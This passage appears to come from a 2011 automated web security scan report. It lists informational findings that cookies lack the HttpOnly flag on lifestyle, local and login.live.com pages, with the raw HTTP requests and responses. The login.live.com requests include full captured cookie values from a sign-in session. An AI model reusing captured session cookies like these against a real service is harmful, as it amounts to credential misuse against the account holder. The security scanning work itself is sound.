Set-Cookie: MUID=1078BE57F6E649E38B580A5D9F01AA70; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.278. http://lifestyle.redacted/your-life/your-money-today/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/your-money-today/article.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 29 Jan 2011 23:47:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx
Set-Cookie: MC1=V=3&GUID=0398126e49724201804ec2ac840e992d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=57CE9474CD8C417D817D0DE1275373E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:23 GMT; path=/
Cache-Control: no-cache
Content-Length: 0


17.279. http://lifestyle.redacted/your-life/your-money-today/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/video.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/your-money-today/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=90974142a1fa41e29c7695f2839c0b2b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=891F4DE87D9848CF80723C7BDFB3C47D; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.280. http://lifestyle.redacted/your-look/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6dd6fe6121814e1988587a283896d37d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1E75E2518F694A5EA1B2E04278A9FA88; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.281. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/makeup-skin-care-hair/staticslideshowessence.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e4b40a5c5380474087c7ce996b9332b8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D137C55805D5479EA6BDD999E5265BC4; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.282. http://lifestyle.redacted/your-look/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/video/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/video/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2ca1bb8bab954b2e8916ae5a5e84634d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A5D1B9B54E4F4F0A904965554C0FDE74; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:20 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

17.283. http://live.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://live.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: live.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Host,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a4bc8d41ac71ec541f1bf853a146540d; expires=Sat, 25-Jan-2031 02:08:23 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


17.284. http://local.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8349c3df213b40858bffbf1ed5e320d4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AEB046B1DD804980BD22C1D7DC865D48; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.285. http://local.redacted/events.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /events.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 23:47:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
STATUS_CODE: NotFound
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0af244c7b84341db94fa63f78ec59843; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7CDA6FC0BCE8438688C10A27DAA3A3FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 6288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
       <meta http-e
...[SNIP]...

17.286. http://local.redacted/gas-traffic.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /gas-traffic.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gas-traffic.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=5b47497cc43743d9be4c3d0002efa31f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=72D4472BCF114A3497BE87B9061DAD51; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.287. http://local.redacted/hourly.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /hourly.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hourly.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA25
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fe9b558f11c048c5b0bcfead5c27909c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D700EC8FE6A84E6E86AF10C957726EEB; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.288. http://local.redacted/movies-events.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /movies-events.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies-events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=362ea74ed69b4e3e91979daf6227ebc5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=54E9E8A3E60641D9AC7FE4403046D572; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.289. http://local.redacted/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /news.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3953a7e65afb42b0ade3749d752dcf1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C14043A1E67E44BCAA9A3B68AA8AFD89; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.290. http://local.redacted/restaurants.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /restaurants.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /restaurants.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA31
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=11c3bf43b93e4ed9af237f65b02844d7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=47142BBDAAA74E00893F20DA82ED8C2E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.291. http://local.redacted/sports.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /sports.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sports.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:41 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d11d2c165e674866abd16c8b8cb9e1bb; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A7A43B87D4E04DEA9AC850EC95E92AE2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.292. http://local.redacted/ten-day.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /ten-day.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ten-day.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b091c91e5f57464f867c86a6838b0181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5D4B178CF6734098BD0B688BB765F218; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.293. http://local.redacted/weather.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /weather.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weather.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fd5b4d05da194df0bdd44cf8adbd21ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2B70DCC8FEC94F45B962D0715AF96955; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.294. http://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:47:54 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H24 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:54 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344874&id=N&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-f2f145b9-7949-4a38-9839-b8a7726474e0; path=/;version=1
X-Frame-Options: deny
Content-Length: 11332

<!-- ServerInfo: BAYIDSLGN1H24 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...

17.295. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US HTTP/1.1
Host: login.live.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; xidseq=1; mktstate=S=821848180&U=&E=&P=&B=en-us; mkt1=norm=en-us; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; wla42=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 29 Jan 2011 23:12:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:11:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H55 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Vary: Accept-Encoding
Content-Length: 13981

<!-- ServerInfo: BAYIDSLGN1H55 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...

17.296. https://login.live.com/pp900/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp900/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pp900/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H36 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342794&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4c2d8b39-4613-4bc8-bb07-53657b3f42ca; path=/;version=1
